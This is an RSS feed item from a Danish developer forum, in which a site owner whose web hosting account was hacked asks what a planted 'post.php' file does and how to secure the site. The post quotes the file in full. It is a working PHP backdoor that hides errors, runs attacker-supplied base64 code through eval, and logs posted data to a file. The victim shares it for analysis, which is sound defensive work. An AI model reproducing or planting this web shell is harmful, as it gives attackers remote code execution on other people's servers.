<?xml version="1.0" encoding="iso-8859-1"?>
<rss version="2.0">
  <channel>
    <title>Udvikleren.dk - Seneste [hacket] forum tråde</title>
    <description>De seneste forum tråde i [hacket] på Udvikleren.dk</description>
    <link>http://www.udvikleren.dk/</link>
    <pubDate>Wed, 29 Apr 2026 21:31:21 GMT</pubDate>
    <docs>http://backend.userland.com/rss</docs>
    <generator>Udvikleren.dk RSS Feeder</generator>
    <ttl>60</ttl>
    <item>
      <title>Når ens webhotel bliver hacket?</title>
      <description>Jeg har tidligere i år oplevet at ét af mine domæner var blevet hacket.&lt;br /&gt;Det var en hjemmeside som faktisk var mere eller mindre tom, da den "kun" virkede som "henvisningsside".&lt;br /&gt;Løsningen var jo derfor enkel, alt blev slettet, FTP password osv. skiftet og problemer var løst. &lt;br /&gt;&lt;br /&gt;Måske!&lt;br /&gt;For i dag har jeg fået besked om at noget kunne tyde på at der alligevel ikke blev renset helt ud g at det måske er mere end et enkelt domæne som er påvirket. &lt;br /&gt;Øv. Så er der jo ikke andet at gøre end at få det hele gået igennem endnu engang.&lt;br /&gt;&lt;br /&gt;Jeg har fundet en fil som hedder "post.php". Denne er IKKE en som jeg selv har uploadet og eg aner ikke hvor den kommer fra, så jeg har selvfølgelig slettet den fra serveren. Fandt den under hvert af de domæner som mistænkes at være "ramt".&lt;br /&gt;&lt;br /&gt;Er der nogen der kan se ud fra koden, hvad det er for en type?&lt;br /&gt;&lt;br /&gt;&lt;div class="codeboxheader" id="code_1751693203" onclick="ToggleCodeBox(this.id);"&gt;&lt;img id="code_1751693203_arrow" src="/images/icons/codeboxarrow_down.gif" alt="Fold kodeboks ind/ud" title="Fold kodeboks ind/ud" /&gt;Kode&amp;nbsp;&lt;/div&gt;&lt;pre id="code_1751693203code" style="border-top: 0px; display: none;"&gt;&amp;lt;?php

@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
@ini_set("memory_limit", "128M");
@ini_set("max_execution_time",30);
@set_time_limit(30); 

if (isset($_SERVER["HTTP_X_REAL_IP"])) $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_X_REAL_IP"];

if (isset($_POST["code"]))
{
	eval(base64_decode($_POST["code"]));
}

elseif (isset($_SERVER["HTTP_CONTENT_ENCODING"]) &amp;&amp; $_SERVER["HTTP_CONTENT_ENCODING"] == "binary")
{
	$input = file_get_contents("php://input");

	if (strlen($input) &amp;gt; 0) print "STATUS-IMPORT-OK";

	if (strlen($input) &amp;gt; 10)
	{
		$fp = @fopen(str_replace(".php",".bin",basename($_SERVER["SCRIPT_FILENAME"])), "a");
		@flock($fp, LOCK_EX);
		@fputs($fp, $_SERVER["REMOTE_ADDR"]."\t".base64_encode($input)."\r\n");
		@flock($fp, LOCK_UN);
		@fclose($fp);
	}
}

elseif (strpos($_SERVER["REQUEST_URI"], ".shtml") !== false)
{
	print $_SERVER["REQUEST_URI"];
}


exit;

?&amp;gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Og er der ellers nogen som kunne have nogle god forslag til hvordan man sikre sig bedst muligt mod at blive hacket?</description>
      <link>http://www.udvikleren.dk/forum/43908/naar-ens-webhotel-bliver-hacket/</link>
      <pubDate>Thu, 03 Apr 2014 09:01:22 GMT</pubDate>
    </item>
  </channel>
</rss>